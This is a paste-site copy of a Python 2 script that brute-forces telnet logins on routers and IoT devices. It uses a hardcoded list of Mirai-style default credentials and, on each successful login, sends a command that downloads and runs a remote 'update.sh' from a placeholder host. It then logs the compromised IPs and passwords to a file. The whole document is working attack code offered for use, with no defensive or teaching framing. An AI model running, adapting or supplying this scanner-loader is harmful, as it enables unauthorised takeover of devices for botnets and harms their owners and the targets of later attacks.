SHOW:
|
|
- or go back to the newest paste.
1 | #!/usr/bin/python | |
2 | import threading | |
3 | import sys, os, re, time, socket | |
4 | from Queue import * | |
5 | from sys import stdout | |
6 | ||
7 | if len(sys.argv) < 4: | |
8 | print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>" | |
9 | sys.exit() | |
10 | ||
11 | combo = [ | |
12 | "root:root", | |
13 | "root:", | |
14 | "admin:admin", | |
15 | "support:support", | |
16 | "user:user", | |
17 | "admin:", | |
18 | "admin:password", | |
19 | "root:vizxv", | |
20 | "root:admin", | |
21 | "root:xc3511", | |
22 | "root:888888", | |
23 | "root:xmhdipc", | |
24 | "root:default", | |
25 | "root:juantech", | |
26 | "root:123456", | |
27 | "root:54321", | |
28 | "root:12345", | |
29 | "root:pass", | |
30 | "ubnt:ubnt", | |
31 | "root:klv1234", | |
32 | "root:Zte521", | |
33 | "root:hi3518", | |
34 | "root:jvbzd", | |
35 | "root:anko", | |
36 | "root:zlxx.", | |
37 | "root:7ujMko0vizxv", | |
38 | "root:7ujMko0admin", | |
39 | "root:system", | |
40 | "root:ikwb", | |
41 | "root:dreambox", | |
42 | "root:user", | |
43 | "root:realtek", | |
44 | "root:00000000", | |
45 | "admin:1111111", | |
46 | "admin:1234", | |
47 | "admin:12345", | |
48 | "admin:54321", | |
49 | "admin:123456", | |
50 | "admin:7ujMko0admin", | |
51 | "admin:1234", | |
52 | "admin:pass", | |
53 | "admin:meinsm", | |
54 | "admin:admin1234", | |
55 | "root:1111", | |
56 | "admin:smcadmin", | |
57 | "admin:1111", | |
58 | "root:666666", | |
59 | "root:password", | |
60 | "root:1234", | |
61 | "root:klv123", | |
62 | "Administrator:admin", | |
63 | "service:service", | |
64 | "supervisor:supervisor", | |
65 | "guest:guest", | |
66 | "guest:12345", | |
67 | "guest:12345", | |
68 | "admin1:password", | |
69 | "administrator:1234", | |
70 | "666666:666666", | |
71 | "888888:888888", | |
72 | "tech:tech", | |
73 | "mother:fucker" | |
74 | ] | |
75 | ||
76 | ips = open(sys.argv[1], "r").readlines() | |
77 | threads = int(sys.argv[2]) | |
78 | output_file = sys.argv[3] | |
79 | queue = Queue() | |
80 | queue_count = 0 | |
81 | ||
82 | for ip in ips: | |
83 | queue_count += 1 | |
84 | stdout.write("\r[%d] Added to queue" % queue_count) | |
85 | stdout.flush() | |
86 | queue.put(ip) | |
87 | print "\n" | |
88 | ||
89 | ||
90 | class router(threading.Thread): | |
91 | def __init__ (self, ip): | |
92 | threading.Thread.__init__(self) | |
93 | self.ip = str(ip).rstrip('\n') | |
94 | self.rekdevice="cd /tmp; wget http://0.0.0.0/update.sh; busybox wget http://0.0.0.0/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh" #command to send | |
95 | def run(self): | |
96 | global fh | |
97 | username = "" | |
98 | password = "" | |
99 | for passwd in combo: | |
100 | if ":n/a" in passwd: | |
101 | password="" | |
102 | else: | |
103 | password=passwd.split(":")[1] | |
104 | if "n/a:" in passwd: | |
105 | username="" | |
106 | else: | |
107 | username=passwd.split(":")[0] | |
108 | try: | |
109 | tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
110 | tn.settimeout(0.37) | |
111 | tn.connect((self.ip,23)) | |
112 | except Exception: | |
113 | tn.close() | |
114 | break | |
115 | try: | |
116 | hoho = '' | |
117 | hoho += readUntil(tn, ":") | |
118 | if ":" in hoho: | |
119 | tn.send(username + "\r\n") | |
120 | time.sleep(0.1) | |
121 | except Exception: | |
122 | tn.close() | |
123 | try: | |
124 | hoho = '' | |
125 | hoho += readUntil(tn, ":") | |
126 | if ":" in hoho: | |
127 | tn.send(password + "\r\n") | |
128 | time.sleep(0.1) | |
129 | else: | |
130 | pass | |
131 | except Exception: | |
132 | tn.close() | |
133 | try: | |
134 | prompt = '' | |
135 | prompt += tn.recv(40960) | |
136 | if "#" in prompt or "$": | |
137 | success = True | |
138 | else: | |
139 | tn.close() | |
140 | if success == True: | |
141 | try: | |
142 | tn.send(self.rekdevice + "\r\n") | |
143 | fh.write(self.ip + ":23 " + username + ":" + password + "\n") # 1.1.1.1:23 user:pass # mirai | |
144 | fh.flush() | |
145 | print "[+] GOTCHA -> %s:%s:%s"%(username, password, self.ip) | |
146 | tn.close() | |
147 | break | |
148 | except: | |
149 | tn.close() | |
150 | else: | |
151 | tn.close() | |
152 | except Exception: | |
153 | tn.close() | |
154 | ||
155 | def readUntil(tn, string, timeout=8): | |
156 | buf = '' | |
157 | start_time = time.time() | |
158 | while time.time() - start_time < timeout: | |
159 | buf += tn.recv(1024) | |
160 | time.sleep(0.01) | |
161 | if string in buf: return buf | |
162 | raise Exception('TIMEOUT!') | |
163 | ||
164 | def worker(): | |
165 | try: | |
166 | while True: | |
167 | try: | |
168 | IP = queue.get() | |
169 | thread = router(IP) | |
170 | thread.start() | |
171 | queue.task_done() | |
172 | time.sleep(0.02) | |
173 | except: | |
174 | pass | |
175 | except: | |
176 | pass | |
177 | ||
178 | global fh | |
179 | fh = open("workingtelnet.txt","a") | |
180 | for l in xrange(threads): | |
181 | try: | |
182 | t = threading.Thread(target=worker) | |
183 | t.start() | |
184 | except: | |
185 | pass |